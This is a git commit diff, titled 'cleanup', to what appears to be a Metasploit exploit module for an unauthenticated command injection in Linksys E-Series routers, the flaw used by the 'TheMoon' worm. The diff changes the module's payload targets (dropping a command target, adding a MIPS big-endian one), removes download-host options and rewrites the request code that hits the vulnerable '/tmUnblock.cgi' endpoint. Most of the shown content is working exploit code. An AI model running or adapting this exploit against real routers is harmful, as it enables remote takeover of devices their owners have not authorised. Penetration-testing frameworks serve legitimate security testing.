cleanup

2014-02-23 21:17:32 +01:00 · 2014-02-23 21:17:32 +01:00 · 0126e3fcc8
parent dbbd080fc1
commit 0126e3fcc8
1 changed files with 13 additions and 24 deletions
--- a/modules/exploits/linux/http/linksys_themoon_exec_echo.rb
+++ b/modules/exploits/linux/http/linksys_themoon_exec_echo.rb
@ -9,7 +9,6 @@ class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
-  include Msf::Exploit::FileDropper
  include Msf::Exploit::CmdStagerEcho

  def initialize(info = {})
@ -17,9 +16,9 @@ class Metasploit3 < Msf::Exploit::Remote
      'Name'        => 'Linksys E-Series TheMoon Remote Command Injection',
      'Description' => %q{
          Some Linksys E-Series Routers are vulnerable to an unauthenticated OS command
-        injection. This vulnerability was used from the so called "TheMoon" worm. There 
-        are many Systems that might be vulnerable: 
-        E4200, E3200, E3000, E2500, E2100L, E2000, E1550, E1500, E1200, E1000, E900. This 
+        injection. This vulnerability was used from the so called "TheMoon" worm. There
+        are many Systems that might be vulnerable:
+        E4200, E3200, E3000, E2500, E2100L, E2000, E1550, E1500, E1200, E1000, E900. This
        module was tested against a E1500 v1.0.5.
      },
      'Author'      =>
@ -47,36 +46,28 @@ class Metasploit3 < Msf::Exploit::Remote
        },
      'Targets'        =>
        [
-          [ 'CMD',
-            {
-            'Arch' => ARCH_CMD,
-            'Platform' => 'unix'
-            }
-          ],
          [ 'Linux mipsel Payload',
            {
            'Arch' => ARCH_MIPSLE,
            'Platform' => 'linux'
            }
          ],
+          [ 'Linux mipsbe Payload',
+            {
+            'Arch' => ARCH_MIPSBE,
+            'Platform' => 'linux'
+            }
+          ],
        ],
-      'DefaultTarget'  => 1
+      'DefaultTarget'  => 0
      ))
-
-    register_options(
-      [
-        OptAddress.new('DOWNHOST', [ false, 'An alternative host to request the MIPS payload from' ]),
-        OptString.new('DOWNFILE', [ false, 'Filename to download, (default: random)' ]),
-        OptInt.new('HTTP_DELAY', [true, 'Time that the HTTP Server will wait for the ELF payload request', 60])
-      ], self.class)
  end


  def execute_command(cmd, opts)
-    uri = '/tmUnblock.cgi'
    begin
      res = send_request_cgi({
-        'uri'    => uri,
+        'uri'    => '/tmUnblock.cgi',
        'method' => 'POST',
        'encode_params' => false,
        'vars_post' => {
@ -98,19 +89,17 @@ class Metasploit3 < Msf::Exploit::Remote
  end

  def exploit
-    uri = '/tmUnblock.cgi'
-
    print_status("#{peer} - Trying to access the vulnerable url")
    begin
      res = send_request_cgi({
-        'uri'     => uri,
+        'uri'     => '/tmUnblock.cgi',
        'method'  => 'GET',
      })
      if res.nil? or res.code == 404
        fail_with(Failure::NoAccess, "#{peer} - Access to the vulnerable URL is not possible")
      end
      if [200, 301, 302].include?(res.code)
-        print_good("#{peer} - Successfully accessed #{uri}")
+        print_good("#{peer} - Successfully accessed the vulnerable url")
      else
        fail_with(Failure::NoAccess, "#{peer} - Access to the vulnerable URL is not possible")
      end